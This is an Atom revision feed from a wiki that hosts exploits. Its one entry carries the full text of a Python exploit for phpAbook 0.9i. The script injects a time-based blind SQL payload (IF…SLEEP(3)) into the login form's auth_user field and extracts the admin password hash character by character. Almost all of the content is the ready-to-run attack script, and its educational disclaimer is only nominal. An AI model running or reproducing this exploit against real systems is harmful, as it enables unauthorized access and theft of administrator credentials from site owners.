<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=PhpAbook_0.9i_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E</id>
	<title>PhpAbook 0.9i SQL注入漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=PhpAbook_0.9i_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=PhpAbook_0.9i_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-14T18:47:31Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=PhpAbook_0.9i_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=6079&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;&lt;pre&gt; # Exploit Title: phpAbook 0.9i - SQL Injection # Date: 2021-06-29 # Vendor Homepage: http://sourceforge.net/projects/phpabook/ # Exploit Author: Said Cortes, Alejandro P...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=PhpAbook_0.9i_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=6079&amp;oldid=prev"/>
		<updated>2021-06-30T13:51:41Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;&amp;lt;pre&amp;gt; # Exploit Title: phpAbook 0.9i - SQL Injection # Date: 2021-06-29 # Vendor Homepage: http://sourceforge.net/projects/phpabook/ # Exploit Author: Said Cortes, Alejandro P...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: phpAbook 0.9i - SQL Injection&lt;br /&gt;
# Date: 2021-06-29&lt;br /&gt;
# Vendor Homepage: http://sourceforge.net/projects/phpabook/&lt;br /&gt;
# Exploit Author: Said Cortes, Alejandro Perez&lt;br /&gt;
# Version: v0.9i&lt;br /&gt;
# This was written for educational purpose. Use it at your own risk.&lt;br /&gt;
# Author will be not responsible for any damage.&lt;br /&gt;
&lt;br /&gt;
import requests&lt;br /&gt;
import argparse&lt;br /&gt;
import string&lt;br /&gt;
import sys&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
def exploit(session,host):&lt;br /&gt;
    print(&amp;quot;Starting Exploit\nSearching Admin Hash...&amp;quot;)&lt;br /&gt;
    passwordhash = ''&lt;br /&gt;
    for i in range(1,33):&lt;br /&gt;
        charset = string.digits + string.ascii_lowercase&lt;br /&gt;
        for letter in charset:&lt;br /&gt;
            burp0_url = f&amp;quot;{host}/index.php&amp;quot;&lt;br /&gt;
            burp0_data = {&amp;quot;auth_user&amp;quot;: f&amp;quot;admin'-IF((SELECT MID(password,{i},1) from ab_auth_user where uid=1)='{letter}',SLEEP(3),0)#&amp;quot;, &amp;quot;auth_passwd&amp;quot;: &amp;quot;admin&amp;quot;, &amp;quot;lang&amp;quot;: &amp;quot;en&amp;quot;, &amp;quot;submit&amp;quot;: &amp;quot;Login&amp;quot;}&lt;br /&gt;
            try:&lt;br /&gt;
                session.post(burp0_url, data=burp0_data, timeout=1)&lt;br /&gt;
            except requests.Timeout:&lt;br /&gt;
                passwordhash += letter&lt;br /&gt;
                continue&lt;br /&gt;
    print(&amp;quot;admin:&amp;quot;+passwordhash)&lt;br /&gt;
        &lt;br /&gt;
&lt;br /&gt;
                &lt;br /&gt;
    &lt;br /&gt;
if __name__ == &amp;quot;__main__&amp;quot; :&lt;br /&gt;
    session = requests.session()&lt;br /&gt;
    parser = argparse.ArgumentParser()&lt;br /&gt;
    parser.add_argument(&amp;quot;-u&amp;quot;,&amp;quot;--url&amp;quot;,help=&amp;quot;host url \nex: http://127.0.0.1/phpabook&amp;quot;,required=True)&lt;br /&gt;
    arg = parser.parse_args()&lt;br /&gt;
    exploit(session,arg.url)&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>